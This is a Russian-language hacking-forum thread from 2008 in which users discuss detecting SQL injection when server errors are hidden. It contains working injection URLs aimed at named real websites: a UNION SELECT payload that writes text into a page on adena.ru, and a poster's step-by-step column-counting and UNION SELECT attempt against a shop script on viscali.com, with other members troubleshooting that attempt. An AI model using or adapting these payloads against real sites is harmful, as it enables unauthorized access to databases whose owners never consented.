 |
|
20.03.2008, 16:08
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
С нами:
9568860
Репутация:
146
|
|
можно ли как нибудь вывести слово на страницу через запрос? ведь есть серваки где не показываетсая отчет об ошибке и не понятно есть ли так sql inc
|
|
|
20.03.2008, 17:23
|
|
Познающий
Регистрация: 15.09.2005
Сообщений: 60
С нами:
10869277
Репутация:
52
|
|
Сообщение от bag
можно ли как нибудь вывести слово на страницу через запрос? ведь есть серваки где не показываетсая отчет об ошибке и не понятно есть ли так sql inc
Да. Вот ссылка для примера.
Код:
http://adena.ru/keys.php?id=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,'%3CH1%3E%D0%92%D0%AB%D0%92%D0%9E%D0%94%D0%98%D0%9C%D0%AB%D0%99%20%D0%A2%D0%95%D0%9A%D0%A1%D0%A2%3C/H1%3E',22/*
|
|
|
|
20.03.2008, 17:52
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
С нами:
9568860
Репутация:
146
|
|
чет не то
|
|
|
|
20.03.2008, 17:58
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
С нами:
9568860
Репутация:
146
|
|
т.е. это прокатит если знаешь кол-во столбцев, а если нет...
|
|
|
|
20.03.2008, 18:19
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
2 bag
Сформулируй вопрос яснее.Если ты имеешь ввиду как узнать есть ли инъекция при отключенных ошибках сервера то нужно почитать статьи т.к способов очень много и сдесь их все не изложишь Например эту:
_http://forum.antichat.ru/threadnav43966-1-10.html
Ну а вооще какой вопрос -такой ответ Dima-k17 написал тебе именно то ,что ты спросил
|
|
|
|
20.03.2008, 18:27
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
С нами:
9568860
Репутация:
146
|
|
да я имею ввиду как узнать есть ли инъекция при отключенных ошибках сервера, статьи читал, я ищу более менее универсальный метод, вывод текста на страницу было бы самое то  |
|
|
|
20.03.2008, 18:46
|
|
Новичок
Регистрация: 17.03.2008
Сообщений: 4
С нами:
9553973
Репутация:
19
|
|
Столкнулся с такой проблемкой, мб поможете... Начнем с начала
Описание уязвимости - http://www.securitylab.ru/vulnerability/312412.php
Нашол бажный скрипт - http://viscali.com/shop/main_bigware_53.php
Начал подбирать кол-во полей:
http://viscali.com/shop/main_bigware_53.php?op=results&pollid=-1+group+by+1/* - нет ошибки
http://viscali.com/shop/main_bigware_53.php?op=results&pollid=-1+group+by+2/* - ошибка
Исходя из этого сделал вывод что столбец у нас один.
Далее http://viscali.com/shop/main_bigware_53.php?op=results&pollid=-1+union+select+1/*
Выдает ошибку... Почему, ведь количество столбцов верное?
Последний раз редактировалось _3lf; 20.03.2008 в 22:03..
|
|
|
|
20.03.2008, 21:23
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами:
10243046
Репутация:
3033
|
|
колличество то может быть и верное, а вот запрос неверный
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
20.03.2008, 22:06
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами:
9762146
Репутация:
1174
|
|
очень возможно, что там подряд идет два запроса, отсюда , когда у тебя верен первый, второй возвращает ложь.
|
|
|
|
20.03.2008, 22:17
|
|
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
С нами:
10139366
Репутация:
1502
|
|
Сообщение от _3lf
Далее http://viscali.com/shop/main_bigware_53.php?op=results&pollid=-1+union+select+1/*
Выдает ошибку... Почему, ведь количество столбцов верное?
select 1 фозвращает число ОДИН, а не первый столбец
__________________
Bedankt euch dafür bei euch selbst.
H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
